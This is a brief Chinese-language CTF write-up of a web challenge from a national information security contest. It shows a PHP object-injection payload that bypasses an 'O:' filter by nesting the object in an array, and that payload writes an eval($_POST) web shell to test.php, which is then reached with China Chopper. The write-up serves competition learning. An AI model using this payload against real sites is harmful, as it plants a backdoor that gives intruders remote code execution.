第十二届全国信息安全竞赛——华中赛区(web1)
第十二届全国信息安全竞赛——华中赛区(web1)
打开题目发现:
点击Link Start链接看见源码:
代码审计,经过分析发现反序列化函数以及文件写入函数:
但是发现不能以O:开头,也不能O:后面接数字。
不能以O:开头就用数组反序列化,把类放在数组内。至于正则的绕过用+号绕过。
直接在本地用PHP代码进行反序列化:
得到:
a:1:{i:0;O:7:“BlogLog”:2:{s:4:“log_”;s:10:"./test.php";s:7:“content”;s:25:"<?php eval($_POST[xx]);?>";}}
直接用data参数传入,但是发现无法访问test.php,经过URL编码之后再次传入,成功访问test.php,用菜刀连接: